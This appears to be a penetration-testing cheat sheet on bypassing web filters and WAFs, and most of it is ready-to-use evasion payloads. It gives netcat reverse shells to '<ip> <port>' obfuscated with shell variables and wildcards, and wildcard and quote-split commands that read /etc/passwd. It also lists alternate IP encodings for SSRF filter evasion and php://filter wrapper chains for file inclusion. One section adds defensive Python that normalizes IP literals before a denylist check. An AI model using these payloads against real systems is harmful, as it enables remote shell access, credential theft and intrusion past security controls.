# Web Filter Bypass

## Payloads and Bypass Methods for Web Filtering

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings" %}
swisskyrepo / PayloadsAllTheThings
{% endembed %}

{% embed url="https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf/" %}
How To Exploit PHP Remotely To Bypass Filters & WAF Rules
{% endembed %}

### Use Uninitialized Shell Variables to Bypass Filters

{% embed url="https://www.secjuice.com/web-application-firewall-waf-evasion/" %}
Web Application Firewall (WAF) Evasion Techniques #3
{% endembed %}

Uninitialized shell variables expand to an empty string, so inserting one into a command breaks up the keywords a web application firewall (WAF) matches on without changing what the shell runs. Example: bypassing a filter to execute a reverse shell: `nc$u -e /bin$u/bash$u <ip> <port>`. If this doesn't work, try adding spaces before and after the variable (note the `+`s; this example is also URL encoded): `nc+$u++-e+/bin$u/bash$u <ip> <port>`. *(`$u` here is a random attacker-picked variable name that would hopefully be uninitialized on the target.)*

### Use Wildcards to Bypass Filters

{% embed url="https://medium.com/secjuice/waf-evasion-techniques-718026d693d8" %}
Web Application Firewall (WAF) Evasion Techniques
{% endembed %}

Bash wildcards can stand in for filtered characters: `/???/?s` (for `/bin/ls`), or `/?cmd=%2f???%2f??t%20%2f???%2fp??s??` (URL-encoded `/???/??t /???/p??s??`), will bypass the filter and execute every path that matches the pattern, such as `/bin/cat /etc/apt` and `/bin/cat /etc/passwd`.

Netcat firewall bypass: `/???/n? -e /???/b??h 2130706433 1337` (for nc traditional use `/???/?c.??????????? -e /???/b??h 2130706433 1337`; `2130706433` is `127.0.0.1` in decimal, see below).

```
Standard:   /bin/nc 127.0.0.1 1337
Evasion:    /???/n? 2130706433 1337
Used chars: / ? n [0-9]

Standard:   /bin/cat /etc/passwd
Evasion:    /???/??t /???/??ss??
Used chars: / ? t s
```

### Use String Concatenation to Bypass Filters

```
$ /bin/cat /etc/passwd
$ /bin/cat /e'tc'/pa'ss'wd
$ /bin/c'at' /e'tc'/pa'ss'wd
$ /b'i'n/c'a't /e't'c/p'a's's'w'd'
A backslash (\) can be used instead of ' as well
```

### Convert IP Address to Other Formats

* <https://h.43z.one/ipconverter/>

An IP address written in another format (decimal, hexadecimal, octal, or with parts dropped) is still understood by most programs and libraries, because they resolve it with `inet_aton`-style parsing, yet it contains no `.` character for a filter to match on: `127.0.0.1 = 2130706433`.

```
http://127.0.0.1

#Dropped zeros (the last part fills the missing bytes)
http://127.0.1
http://127.1

#Decimal
http://2130706433

#Hexadecimal
http://0x7f000001

#Dotted hexadecimal
http://0x7f.0x0.0x0.0x1
http://0x7f.0x000001
http://0x7f.0x0.00x0001

#Octal (leading 0), with or without zero padding
http://0177.00.00.01
http://000000177.0000000.000000000.0001
http://017700000001

#URL-encoded
http://%31%32%37%2e%30%2e%30%2e%31

#Mixed decimal, hexadecimal and octal parts
http://127.0x0.000000000.0x1

#Unicode digits (circled digits and fullwidth full stop)
http://①②⑦．⓪．⓪．①
```

Injecting IPs when `.` is disallowed: convert dotted-decimal format to decimal value - [`ip2dh`](https://github.com/4ndr34z/MyScripts/blob/master/ip2dh.py)
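The flip side for a defender: a filter that compares the raw host string against `127.0.0.1` misses every form listed above, so the host has to be canonicalized first. The Python below is an added example (not from these notes or from `ip2dh`); it reimplements `inet_aton` parsing rules, and the function names are my own.

```python
import re
import unicodedata
from urllib.parse import unquote, urlsplit

# inet_aton parses each dotted part as hex (0x..), octal (leading 0) or decimal.
_HEX = re.compile(r"0[xX][0-9a-fA-F]*")
_OCT = re.compile(r"0[0-7]*")
_DEC = re.compile(r"[0-9]+")


def _parse_part(part):
    """One component under inet_aton rules; None if it is malformed (e.g. "08")."""
    if _HEX.fullmatch(part):
        return int(part[2:] or "0", 16)
    if len(part) > 1 and part[0] == "0":        # a leading zero forces octal
        return int(part, 8) if _OCT.fullmatch(part) else None
    return int(part, 10) if _DEC.fullmatch(part) else None


def legacy_ipv4_to_int(host):
    """32-bit value of an inet_aton-style literal (1 to 4 parts, the last part
    filling the remaining bytes), or None if the host is not such a literal."""
    # Undo two encodings a string match misses: percent-encoding (%31%32%37...)
    # and fullwidth or circled digits and stops, which NFKC folds to ASCII.
    host = unicodedata.normalize("NFKC", unquote(host))
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    nums = [_parse_part(p) for p in parts]
    if any(n is None for n in nums):
        return None
    *head, last = nums
    tail_bytes = 4 - len(head)                  # bytes covered by the last part
    if any(n > 255 for n in head) or last >= 1 << (8 * tail_bytes):
        return None
    value = 0
    for n in head:
        value = (value << 8) | n
    return (value << (8 * tail_bytes)) | last


def canonical_host(url):
    """Dotted-decimal form of the URL's host (the form a denylist should be
    matched against), or the hostname unchanged when it is not an IPv4 literal."""
    host = urlsplit(url).hostname or ""
    value = legacy_ipv4_to_int(host)
    if value is None:
        return host
    return ".".join(str((value >> s) & 0xFF) for s in (24, 16, 8, 0))
```

Every entry in the list above except the malformed `00x0001` part canonicalizes to `127.0.0.1`, which is the value a loopback or private-range check should be run against.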

### LFI / RFI by Bypassing Filters Using Wrappers

From [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/73aa26ba6891981ec2254907b9bbd4afdc745e1d/File%20Inclusion/README.md#lfi--rfi-using-wrappers): the `php://filter/` wrapper offers multiple filters for getting past PHP input filters, and they can be chained with `|` or `/`. Other wrappers worth trying include `zip`, `data`, `expect`, `input` and `phar`; there are many more.

```php
/zlib.deflate/read=string.rot13/convert.base64-encode/convert.iconv.utf-8.utf-16/resource=<resource to get>
```
